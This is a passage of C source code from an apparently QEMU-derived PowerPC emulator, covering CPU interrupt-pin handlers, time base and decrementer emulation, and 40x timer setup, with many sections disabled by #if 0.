pin %d\n", __func__, pin); return; } if (level) env->irq_input_state |= 1 << pin; else env->irq_input_state &= ~(1 << pin); } } #endif void ppc6xx_irq_init(PowerPCCPU *cpu) { #if 0 CPUPPCState *env = &cpu->env; env->irq_inputs = (void **)qemu_allocate_irqs(&ppc6xx_set_irq, cpu, PPC6xx_INPUT_NB); #endif } #if defined(TARGET_PPC64) #if 0 /* PowerPC 970 internal IRQ controller */ static void ppc970_set_irq(void *opaque, int pin, int level) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int cur_level; LOG_IRQ("%s: env %p pin %d level %d\n", __func__, env, pin, level); cur_level = (env->irq_input_state >> pin) & 1; /* Don't generate spurious events */ if ((cur_level == 1 && level == 0) || (cur_level == 0 && level != 0)) { CPUState *cs = CPU(cpu); switch (pin) { case PPC970_INPUT_INT: /* Level sensitive - active high */ LOG_IRQ("%s: set the external IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_EXT, level); break; case PPC970_INPUT_THINT: /* Level sensitive - active high */ LOG_IRQ("%s: set the SMI IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_THERM, level); break; case PPC970_INPUT_MCP: /* Negative edge sensitive */ /* XXX: TODO: actual reaction may depends on HID0 status * 603/604/740/750: check HID0[EMCP] */ if (cur_level == 1 && level == 0) { LOG_IRQ("%s: raise machine check state\n", __func__); ppc_set_irq(cpu, PPC_INTERRUPT_MCK, 1); } break; case PPC970_INPUT_CKSTP: /* Level sensitive - active low */ /* XXX: TODO: relay the signal to CKSTP_OUT pin */ if (level) { LOG_IRQ("%s: stop the CPU\n", __func__); cs->halted = 1; } else { LOG_IRQ("%s: restart the CPU\n", __func__); cs->halted = 0; // qemu_cpu_kick(cs); } break; case PPC970_INPUT_HRESET: /* Level sensitive - active low */ if (level) { cpu_interrupt(cs, CPU_INTERRUPT_RESET); } break; case PPC970_INPUT_SRESET: LOG_IRQ("%s: set the RESET IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_RESET, level); break; case PPC970_INPUT_TBEN: LOG_IRQ("%s: set the TBEN state to %d\n", __func__, level); /* XXX: TODO */ break; default: /* Unknown pin - do nothing */ LOG_IRQ("%s: unknown IRQ pin %d\n", __func__, pin); return; } if (level) env->irq_input_state |= 1 << pin; else env->irq_input_state &= ~(1 << pin); } } #endif void ppc970_irq_init(PowerPCCPU *cpu) { #if 0 CPUPPCState *env = &cpu->env; env->irq_inputs = (void **)qemu_allocate_irqs(&ppc970_set_irq, cpu, PPC970_INPUT_NB); #endif } #if 0 /* POWER7 internal IRQ controller */ static void power7_set_irq(void *opaque, int pin, int level) { PowerPCCPU *cpu = opaque; LOG_IRQ("%s: env %p pin %d level %d\n", __func__, &cpu->env, pin, level); switch (pin) { case POWER7_INPUT_INT: /* Level sensitive - active high */ LOG_IRQ("%s: set the external IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_EXT, level); break; default: /* Unknown pin - do nothing */ LOG_IRQ("%s: unknown IRQ pin %d\n", __func__, pin); return; } } #endif void ppcPOWER7_irq_init(PowerPCCPU *cpu) { #if 0 CPUPPCState *env = &cpu->env; env->irq_inputs = (void **)qemu_allocate_irqs(&power7_set_irq, cpu, POWER7_INPUT_NB); #endif } #if 0 /* POWER9 internal IRQ controller */ static void power9_set_irq(void *opaque, int pin, int level) { PowerPCCPU *cpu = opaque; LOG_IRQ("%s: env %p pin %d level %d\n", __func__, &cpu->env, pin, level); switch (pin) { case POWER9_INPUT_INT: /* Level sensitive - active high */ LOG_IRQ("%s: set the external IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_EXT, level); break; case POWER9_INPUT_HINT: /* Level sensitive - active high */ LOG_IRQ("%s: set the external IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_HVIRT, level); break; default: /* Unknown pin - do nothing */ LOG_IRQ("%s: unknown IRQ pin %d\n", __func__, pin); return; } } #endif void ppcPOWER9_irq_init(PowerPCCPU *cpu) { #if 0 CPUPPCState *env = &cpu->env; env->irq_inputs = (void **)qemu_allocate_irqs(&power9_set_irq, cpu, POWER9_INPUT_NB); #endif } #endif /* defined(TARGET_PPC64) */ void ppc40x_core_reset(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; target_ulong dbsr; // qemu_log_mask(CPU_LOG_RESET, "Reset PowerPC core\n"); cpu_interrupt(CPU(cpu), CPU_INTERRUPT_RESET); dbsr = env->spr[SPR_40x_DBSR]; dbsr &= ~0x00000300; dbsr |= 0x00000100; env->spr[SPR_40x_DBSR] = dbsr; } void ppc40x_chip_reset(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; target_ulong dbsr; // qemu_log_mask(CPU_LOG_RESET, "Reset PowerPC chip\n"); cpu_interrupt(CPU(cpu), CPU_INTERRUPT_RESET); /* XXX: TODO reset all internal peripherals */ dbsr = env->spr[SPR_40x_DBSR]; dbsr &= ~0x00000300; dbsr |= 0x00000200; env->spr[SPR_40x_DBSR] = dbsr; } void ppc40x_system_reset(PowerPCCPU *cpu) { // qemu_log_mask(CPU_LOG_RESET, "Reset PowerPC system\n"); // qemu_system_reset_request(SHUTDOWN_CAUSE_GUEST_RESET); } void store_40x_dbcr0(CPUPPCState *env, uint32_t val) { PowerPCCPU *cpu = env_archcpu(env); switch ((val >> 28) & 0x3) { case 0x0: /* No action */ break; case 0x1: /* Core reset */ ppc40x_core_reset(cpu); break; case 0x2: /* Chip reset */ ppc40x_chip_reset(cpu); break; case 0x3: /* System reset */ ppc40x_system_reset(cpu); break; } } #if 0 /* PowerPC 40x internal IRQ controller */ static void ppc40x_set_irq(void *opaque, int pin, int level) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int cur_level; LOG_IRQ("%s: env %p pin %d level %d\n", __func__, env, pin, level); cur_level = (env->irq_input_state >> pin) & 1; /* Don't generate spurious events */ if ((cur_level == 1 && level == 0) || (cur_level == 0 && level != 0)) { CPUState *cs = CPU(cpu); switch (pin) { case PPC40x_INPUT_RESET_SYS: if (level) { LOG_IRQ("%s: reset the PowerPC system\n", __func__); ppc40x_system_reset(cpu); } break; case PPC40x_INPUT_RESET_CHIP: if (level) { LOG_IRQ("%s: reset the PowerPC chip\n", __func__); ppc40x_chip_reset(cpu); } break; case PPC40x_INPUT_RESET_CORE: /* XXX: TODO: update DBSR[MRR] */ if (level) { LOG_IRQ("%s: reset the PowerPC core\n", __func__); ppc40x_core_reset(cpu); } break; case PPC40x_INPUT_CINT: /* Level sensitive - active high */ LOG_IRQ("%s: set the critical IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_CEXT, level); break; case PPC40x_INPUT_INT: /* Level sensitive - active high */ LOG_IRQ("%s: set the external IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_EXT, level); break; case PPC40x_INPUT_HALT: /* Level sensitive - active low */ if (level) { LOG_IRQ("%s: stop the CPU\n", __func__); cs->halted = 1; } else { LOG_IRQ("%s: restart the CPU\n", __func__); cs->halted = 0; // qemu_cpu_kick(cs); } break; case PPC40x_INPUT_DEBUG: /* Level sensitive - active high */ LOG_IRQ("%s: set the debug pin state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_DEBUG, level); break; default: /* Unknown pin - do nothing */ LOG_IRQ("%s: unknown IRQ pin %d\n", __func__, pin); return; } if (level) env->irq_input_state |= 1 << pin; else env->irq_input_state &= ~(1 << pin); } } #endif void ppc40x_irq_init(PowerPCCPU *cpu) { #if 0 CPUPPCState *env = &cpu->env; env->irq_inputs = (void **)qemu_allocate_irqs(&ppc40x_set_irq, cpu, PPC40x_INPUT_NB); #endif } #if 0 /* PowerPC E500 internal IRQ controller */ static void ppce500_set_irq(void *opaque, int pin, int level) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int cur_level; LOG_IRQ("%s: env %p pin %d level %d\n", __func__, env, pin, level); cur_level = (env->irq_input_state >> pin) & 1; /* Don't generate spurious events */ if ((cur_level == 1 && level == 0) || (cur_level == 0 && level != 0)) { switch (pin) { case PPCE500_INPUT_MCK: if (level) { LOG_IRQ("%s: reset the PowerPC system\n", __func__); // qemu_system_reset_request(SHUTDOWN_CAUSE_GUEST_RESET); } break; case PPCE500_INPUT_RESET_CORE: if (level) { LOG_IRQ("%s: reset the PowerPC core\n", __func__); ppc_set_irq(cpu, PPC_INTERRUPT_MCK, level); } break; case PPCE500_INPUT_CINT: /* Level sensitive - active high */ LOG_IRQ("%s: set the critical IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_CEXT, level); break; case PPCE500_INPUT_INT: /* Level sensitive - active high */ LOG_IRQ("%s: set the core IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_EXT, level); break; case PPCE500_INPUT_DEBUG: /* Level sensitive - active high */ LOG_IRQ("%s: set the debug pin state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_DEBUG, level); break; default: /* Unknown pin - do nothing */ LOG_IRQ("%s: unknown IRQ pin %d\n", __func__, pin); return; } if (level) env->irq_input_state |= 1 << pin; else env->irq_input_state &= ~(1 << pin); } } #endif void ppce500_irq_init(PowerPCCPU *cpu) { #if 0 CPUPPCState *env = &cpu->env; env->irq_inputs = (void **)qemu_allocate_irqs(&ppce500_set_irq, cpu, PPCE500_INPUT_NB); #endif } /* Enable or Disable the E500 EPR capability */ void ppce500_set_mpic_proxy(bool enabled) { #if 0 CPUState *cs; CPU_FOREACH(cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); cpu->env.mpic_proxy = enabled; if (kvm_enabled()) { kvmppc_set_mpic_proxy(cpu, enabled); } } #endif } /*****************************************************************************/ /* PowerPC time base and decrementer emulation */ uint64_t cpu_ppc_get_tb(ppc_tb_t *tb_env, uint64_t vmclk, int64_t tb_offset) { /* TB time in tb periods */ return muldiv64(vmclk, tb_env->tb_freq, NANOSECONDS_PER_SECOND) + tb_offset; } uint64_t cpu_ppc_load_tbl (CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; #if 0 if (kvm_enabled()) { return env->spr[SPR_TBL]; } #endif tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->tb_offset); LOG_TB("%s: tb %016" PRIx64 "\n", __func__, tb); return tb; } static inline uint32_t _cpu_ppc_load_tbu(CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->tb_offset); LOG_TB("%s: tb %016" PRIx64 "\n", __func__, tb); return tb >> 32; } uint32_t cpu_ppc_load_tbu (CPUPPCState *env) { #if 0 if (kvm_enabled()) { return env->spr[SPR_TBU]; } #endif return _cpu_ppc_load_tbu(env); } static inline void cpu_ppc_store_tb(ppc_tb_t *tb_env, uint64_t vmclk, int64_t *tb_offsetp, uint64_t value) { *tb_offsetp = value - muldiv64(vmclk, tb_env->tb_freq, NANOSECONDS_PER_SECOND); LOG_TB("%s: tb %016" PRIx64 " offset %08" PRIx64 "\n", __func__, value, *tb_offsetp); } void cpu_ppc_store_tbl (CPUPPCState *env, uint32_t value) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->tb_offset); tb &= 0xFFFFFFFF00000000ULL; cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->tb_offset, tb | (uint64_t)value); } static inline void _cpu_ppc_store_tbu(CPUPPCState *env, uint32_t value) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->tb_offset); tb &= 0x00000000FFFFFFFFULL; cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->tb_offset, ((uint64_t)value << 32) | tb); } void cpu_ppc_store_tbu (CPUPPCState *env, uint32_t value) { _cpu_ppc_store_tbu(env, value); } uint64_t cpu_ppc_load_atbl (CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->atb_offset); LOG_TB("%s: tb %016" PRIx64 "\n", __func__, tb); return tb; } uint32_t cpu_ppc_load_atbu (CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->atb_offset); LOG_TB("%s: tb %016" PRIx64 "\n", __func__, tb); return tb >> 32; } void cpu_ppc_store_atbl (CPUPPCState *env, uint32_t value) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->atb_offset); tb &= 0xFFFFFFFF00000000ULL; cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->atb_offset, tb | (uint64_t)value); } void cpu_ppc_store_atbu (CPUPPCState *env, uint32_t value) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->atb_offset); tb &= 0x00000000FFFFFFFFULL; cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->atb_offset, ((uint64_t)value << 32) | tb); } uint64_t cpu_ppc_load_vtb(CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; return cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->vtb_offset); } void cpu_ppc_store_vtb(CPUPPCState *env, uint64_t value) { ppc_tb_t *tb_env = env->tb_env; cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->vtb_offset, value); } void cpu_ppc_store_tbu40(CPUPPCState *env, uint64_t value) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->tb_offset); tb &= 0xFFFFFFUL; tb |= (value & ~0xFFFFFFUL); cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->tb_offset, tb); } #if 0 static void cpu_ppc_tb_stop (CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb, atb, vmclk; /* If the time base is already frozen, do nothing */ if (tb_env->tb_freq != 0) { vmclk = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); /* Get the time base */ tb = cpu_ppc_get_tb(tb_env, vmclk, tb_env->tb_offset); /* Get the alternate time base */ atb = cpu_ppc_get_tb(tb_env, vmclk, tb_env->atb_offset); /* Store the time base value (ie compute the current offset) */ cpu_ppc_store_tb(tb_env, vmclk, &tb_env->tb_offset, tb); /* Store the alternate time base value (compute the current offset) */ cpu_ppc_store_tb(tb_env, vmclk, &tb_env->atb_offset, atb); /* Set the time base frequency to zero */ tb_env->tb_freq = 0; /* Now, the time bases are frozen to tb_offset / atb_offset value */ } } static void cpu_ppc_tb_start (CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb, atb, vmclk; /* If the time base is not frozen, do nothing */ if (tb_env->tb_freq == 0) { vmclk = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); /* Get the time base from tb_offset */ tb = tb_env->tb_offset; /* Get the alternate time base from atb_offset */ atb = tb_env->atb_offset; /* Restore the tb frequency from the decrementer frequency */ tb_env->tb_freq = tb_env->decr_freq; /* Store the time base value */ cpu_ppc_store_tb(tb_env, vmclk, &tb_env->tb_offset, tb); /* Store the alternate time base value */ cpu_ppc_store_tb(tb_env, vmclk, &tb_env->atb_offset, atb); } } #endif bool ppc_decr_clear_on_delivery(CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; int flags = PPC_DECR_UNDERFLOW_TRIGGERED | PPC_DECR_UNDERFLOW_LEVEL; return ((tb_env->flags & flags) == PPC_DECR_UNDERFLOW_TRIGGERED); } static inline int64_t _cpu_ppc_load_decr(CPUPPCState *env, uint64_t next) { ppc_tb_t *tb_env = env->tb_env; int64_t decr, diff; diff = next - qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); if (diff >= 0) { decr = muldiv64(diff, tb_env->decr_freq, NANOSECONDS_PER_SECOND); } else if (tb_env->flags & PPC_TIMER_BOOKE) { decr = 0; } else { #ifdef _MSC_VER decr = 0 - muldiv64(0 - diff, tb_env->decr_freq, NANOSECONDS_PER_SECOND); #else decr = -muldiv64(-diff, tb_env->decr_freq, NANOSECONDS_PER_SECOND); #endif } LOG_TB("%s: %016" PRIx64 "\n", __func__, decr); return decr; } target_ulong cpu_ppc_load_decr(CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t decr; #if 0 if (kvm_enabled()) { return env->spr[SPR_DECR]; } #endif decr = _cpu_ppc_load_decr(env, tb_env->decr_next); /* * If large decrementer is enabled then the decrementer is signed extened * to 64 bits, otherwise it is a 32 bit value. */ if (env->spr[SPR_LPCR] & LPCR_LD) { return decr; } return (uint32_t) decr; } target_ulong cpu_ppc_load_hdecr(CPUPPCState *env) { PowerPCCPU *cpu = env_archcpu(env); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); ppc_tb_t *tb_env = env->tb_env; uint64_t hdecr; hdecr = _cpu_ppc_load_decr(env, tb_env->hdecr_next); /* * If we have a large decrementer (POWER9 or later) then hdecr is sign * extended to 64 bits, otherwise it is 32 bits. */ if (pcc->lrg_decr_bits > 32) { return hdecr; } return (uint32_t) hdecr; } uint64_t cpu_ppc_load_purr (CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; return cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->purr_offset); } /* When decrementer expires, * all we need to do is generate or queue a CPU exception */ static inline void cpu_ppc_decr_excp(PowerPCCPU *cpu) { /* Raise it */ LOG_TB("raise decrementer exception\n"); ppc_set_irq(cpu, PPC_INTERRUPT_DECR, 1); } static inline void cpu_ppc_decr_lower(PowerPCCPU *cpu) { ppc_set_irq(cpu, PPC_INTERRUPT_DECR, 0); } static inline void cpu_ppc_hdecr_excp(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; /* Raise it */ LOG_TB("raise hv decrementer exception\n"); /* The architecture specifies that we don't deliver HDEC * interrupts in a PM state. Not only they don't cause a * wakeup but they also get effectively discarded. */ if (!env->resume_as_sreset) { ppc_set_irq(cpu, PPC_INTERRUPT_HDECR, 1); } } static inline void cpu_ppc_hdecr_lower(PowerPCCPU *cpu) { ppc_set_irq(cpu, PPC_INTERRUPT_HDECR, 0); } static void __cpu_ppc_store_decr(PowerPCCPU *cpu, uint64_t *nextp, QEMUTimer *timer, void (*raise_excp)(void *), void (*lower_excp)(PowerPCCPU *), target_ulong decr, target_ulong value, int nr_bits) { #if 0 CPUPPCState *env = &cpu->env; ppc_tb_t *tb_env = env->tb_env; uint64_t now, next; bool negative; /* Truncate value to decr_width and sign extend for simplicity */ value &= ((1ULL << nr_bits) - 1); negative = !!(value & (1ULL << (nr_bits - 1))); if (negative) { value |= (0xFFFFFFFFULL << nr_bits); } LOG_TB("%s: " TARGET_FMT_lx " => " TARGET_FMT_lx "\n", __func__, decr, value); #if 0 if (kvm_enabled()) { /* KVM handles decrementer exceptions, we don't need our own timer */ return; } #endif /* * Going from 2 -> 1, 1 -> 0 or 0 -> -1 is the event to generate a DEC * interrupt. * * If we get a really small DEC value, we can assume that by the time we * handled it we should inject an interrupt already. * * On MSB level based DEC implementations the MSB always means the interrupt * is pending, so raise it on those. * * On MSB edge based DEC implementations the MSB going from 0 -> 1 triggers * an edge interrupt, so raise it here too. */ if ((value < 3) || ((tb_env->flags & PPC_DECR_UNDERFLOW_LEVEL) && negative) || ((tb_env->flags & PPC_DECR_UNDERFLOW_TRIGGERED) && negative && !(decr & (1ULL << (nr_bits - 1))))) { (*raise_excp)(cpu); return; } /* On MSB level based systems a 0 for the MSB stops interrupt delivery */ if (!negative && (tb_env->flags & PPC_DECR_UNDERFLOW_LEVEL)) { (*lower_excp)(cpu); } /* Calculate the next timer event */ now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); next = now + muldiv64(value, NANOSECONDS_PER_SECOND, tb_env->decr_freq); *nextp = next; /* Adjust timer */ timer_mod(timer, next); #endif } static inline void _cpu_ppc_store_decr(PowerPCCPU *cpu, target_ulong decr, target_ulong value, int nr_bits) { ppc_tb_t *tb_env = cpu->env.tb_env; __cpu_ppc_store_decr(cpu, &tb_env->decr_next, tb_env->decr_timer, tb_env->decr_timer->cb, &cpu_ppc_decr_lower, decr, value, nr_bits); } void cpu_ppc_store_decr(CPUPPCState *env, target_ulong value) { PowerPCCPU *cpu = env_archcpu(env); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); int nr_bits = 32; if (env->spr[SPR_LPCR] & LPCR_LD) { nr_bits = pcc->lrg_decr_bits; } _cpu_ppc_store_decr(cpu, cpu_ppc_load_decr(env), value, nr_bits); } static void cpu_ppc_decr_cb(void *opaque) { PowerPCCPU *cpu = opaque; cpu_ppc_decr_excp(cpu); } static inline void _cpu_ppc_store_hdecr(PowerPCCPU *cpu, target_ulong hdecr, target_ulong value, int nr_bits) { ppc_tb_t *tb_env = cpu->env.tb_env; if (tb_env->hdecr_timer != NULL) { __cpu_ppc_store_decr(cpu, &tb_env->hdecr_next, tb_env->hdecr_timer, tb_env->hdecr_timer->cb, &cpu_ppc_hdecr_lower, hdecr, value, nr_bits); } } void cpu_ppc_store_hdecr(CPUPPCState *env, target_ulong value) { PowerPCCPU *cpu = env_archcpu(env); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); _cpu_ppc_store_hdecr(cpu, cpu_ppc_load_hdecr(env), value, pcc->lrg_decr_bits); } static void cpu_ppc_hdecr_cb(void *opaque) { PowerPCCPU *cpu = opaque; cpu_ppc_hdecr_excp(cpu); } void cpu_ppc_store_purr(CPUPPCState *env, uint64_t value) { ppc_tb_t *tb_env = env->tb_env; cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->purr_offset, value); } static void cpu_ppc_set_tb_clk (void *opaque, uint32_t freq) { CPUPPCState *env = opaque; PowerPCCPU *cpu = env_archcpu(env); ppc_tb_t *tb_env = env->tb_env; tb_env->tb_freq = freq; tb_env->decr_freq = freq; /* There is a bug in Linux 2.4 kernels: * if a decrementer exception is pending when it enables msr_ee at startup, * it's not ready to handle it... */ _cpu_ppc_store_decr(cpu, 0xFFFFFFFF, 0xFFFFFFFF, 32); _cpu_ppc_store_hdecr(cpu, 0xFFFFFFFF, 0xFFFFFFFF, 32); cpu_ppc_store_purr(env, 0x0000000000000000ULL); } #if 0 static void timebase_save(PPCTimebase *tb) { uint64_t ticks = cpu_get_host_ticks(); PowerPCCPU *first_ppc_cpu = POWERPC_CPU(first_cpu); if (!first_ppc_cpu->env.tb_env) { // error_report("No timebase object"); return; } /* not used anymore, we keep it for compatibility */ tb->time_of_the_day_ns = qemu_clock_get_ns(QEMU_CLOCK_HOST); /* * tb_offset is only expected to be changed by QEMU so * there is no need to update it from KVM here */ tb->guest_timebase = ticks + first_ppc_cpu->env.tb_env->tb_offset; tb->runstate_paused = runstate_check(RUN_STATE_PAUSED); } static void timebase_load(PPCTimebase *tb) { CPUState *cpu; PowerPCCPU *first_ppc_cpu = POWERPC_CPU(first_cpu); int64_t tb_off_adj, tb_off; unsigned long freq; if (!first_ppc_cpu->env.tb_env) { // error_report("No timebase object"); return; } freq = first_ppc_cpu->env.tb_env->tb_freq; tb_off_adj = tb->guest_timebase - cpu_get_host_ticks(); tb_off = first_ppc_cpu->env.tb_env->tb_offset; trace_ppc_tb_adjust(tb_off, tb_off_adj, tb_off_adj - tb_off, (tb_off_adj - tb_off) / freq); /* Set new offset to all CPUs */ CPU_FOREACH(cpu) { PowerPCCPU *pcpu = POWERPC_CPU(cpu); pcpu->env.tb_env->tb_offset = tb_off_adj; kvmppc_set_reg_tb_offset(pcpu, pcpu->env.tb_env->tb_offset); } } void cpu_ppc_clock_vm_state_change(void *opaque, int running, RunState state) { PPCTimebase *tb = opaque; if (running) { timebase_load(tb); } else { timebase_save(tb); } } /* * When migrating a running guest, read the clock just * before migration, so that the guest clock counts * during the events between: * * * vm_stop() * * * * pre_save() * * This reduces clock difference on migration from 5s * to 0.1s (when max_downtime == 5s), because sending the * final pages of memory (which happens between vm_stop() * and pre_save()) takes max_downtime. */ static int timebase_pre_save(void *opaque) { PPCTimebase *tb = opaque; /* guest_timebase won't be overridden in case of paused guest */ if (!tb->runstate_paused) { timebase_save(tb); } return 0; } const VMStateDescription vmstate_ppc_timebase = { .name = "timebase", .version_id = 1, .minimum_version_id = 1, .minimum_version_id_old = 1, .pre_save = timebase_pre_save, .fields = (VMStateField []) { VMSTATE_UINT64(guest_timebase, PPCTimebase), VMSTATE_INT64(time_of_the_day_ns, PPCTimebase), VMSTATE_END_OF_LIST() }, }; #endif /* Set up (once) timebase frequency (in Hz) */ clk_setup_cb cpu_ppc_tb_init (CPUPPCState *env, uint32_t freq) { PowerPCCPU *cpu = env_archcpu(env); ppc_tb_t *tb_env; tb_env = g_malloc0(sizeof(ppc_tb_t)); env->tb_env = tb_env; tb_env->flags = PPC_DECR_UNDERFLOW_TRIGGERED; if (is_book3s_arch2x(env)) { /* All Book3S 64bit CPUs implement level based DEC logic */ tb_env->flags |= PPC_DECR_UNDERFLOW_LEVEL; } /* Create new timer */ tb_env->decr_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &cpu_ppc_decr_cb, cpu); if (env->has_hv_mode) { tb_env->hdecr_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &cpu_ppc_hdecr_cb, cpu); } else { tb_env->hdecr_timer = NULL; } cpu_ppc_set_tb_clk(env, freq); return &cpu_ppc_set_tb_clk; } /* Specific helpers for POWER & PowerPC 601 RTC */ void cpu_ppc601_store_rtcu (CPUPPCState *env, uint32_t value) { _cpu_ppc_store_tbu(env, value); } uint32_t cpu_ppc601_load_rtcu (CPUPPCState *env) { return _cpu_ppc_load_tbu(env); } void cpu_ppc601_store_rtcl (CPUPPCState *env, uint32_t value) { cpu_ppc_store_tbl(env, value & 0x3FFFFF80); } uint32_t cpu_ppc601_load_rtcl (CPUPPCState *env) { return cpu_ppc_load_tbl(env) & 0x3FFFFF80; } /*****************************************************************************/ /* PowerPC 40x timers */ /* PIT, FIT & WDT */ typedef struct ppc40x_timer_t ppc40x_timer_t; struct ppc40x_timer_t { uint64_t pit_reload; /* PIT auto-reload value */ uint64_t fit_next; /* Tick for next FIT interrupt */ QEMUTimer *fit_timer; uint64_t wdt_next; /* Tick for next WDT interrupt */ QEMUTimer *wdt_timer; /* 405 have the PIT, 440 have a DECR. */ unsigned int decr_excp; }; #if 0 /* Fixed interval timer */ static void cpu_4xx_fit_cb (void *opaque) { PowerPCCPU *cpu; CPUPPCState *env; ppc_tb_t *tb_env; ppc40x_timer_t *ppc40x_timer; uint64_t now, next; env = opaque; cpu = env_archcpu(env); tb_env = env->tb_env; ppc40x_timer = tb_env->opaque; now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); switch ((env->spr[SPR_40x_TCR] >> 24) & 0x3) { case 0: next = 1 << 9; break; case 1: next = 1 << 13; break; case 2: next = 1 << 17; break; case 3: next = 1 << 21; break; default: /* Cannot occur, but makes gcc happy */ return; } next = now + muldiv64(next, NANOSECONDS_PER_SECOND, tb_env->tb_freq); if (next == now) next++; timer_mod(ppc40x_timer->fit_timer, next); env->spr[SPR_40x_TSR] |= 1 << 26; if ((env->spr[SPR_40x_TCR] >> 23) & 0x1) { ppc_set_irq(cpu, PPC_INTERRUPT_FIT, 1); } LOG_TB("%s: ir %d TCR " TARGET_FMT_lx " TSR " TARGET_FMT_lx "\n", __func__, (int)((env->spr[SPR_40x_TCR] >> 23) & 0x1), env->spr[SPR_40x_TCR], env->spr[SPR_40x_TSR]); } #endif /* Programmable interval timer */ static void start_stop_pit (CPUPPCState *env, ppc_tb_t *tb_env, int is_excp) { #if 0 ppc40x_timer_t *ppc40x_timer; uint64_t now, next; ppc40x_timer = tb_env->opaque; if (ppc40x_timer->pit_reload <= 1 || !((env->spr[SPR_40x_TCR] >> 26) & 0x1) || (is_excp && !((env->spr[SPR_40x_TCR] >> 22) & 0x1))) { /* Stop PIT */ LOG_TB("%s: stop PIT\n", __func__); timer_del(tb_env->decr_timer); } else { LOG_TB("%s: start PIT %016" PRIx64 "\n", __func__, ppc40x_timer->pit_reload); now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); next = now + muldiv64(ppc40x_timer->pit_reload, NANOSECONDS_PER_SECOND, tb_env->decr_freq); if (is_excp) next += tb_env->decr_next - now; if (next == now) next++; timer_mod(tb_env->decr_timer, next); tb_env->decr_next = next; } #endif } #if 0 static void cpu_4xx_pit_cb (void *opaque) { PowerPCCPU *cpu; CPUPPCState *env; ppc_tb_t *tb_env; ppc40x_timer_t *ppc40x_timer; env = opaque; cpu = env_archcpu(env); tb_env = env->tb_env; ppc40x_timer = 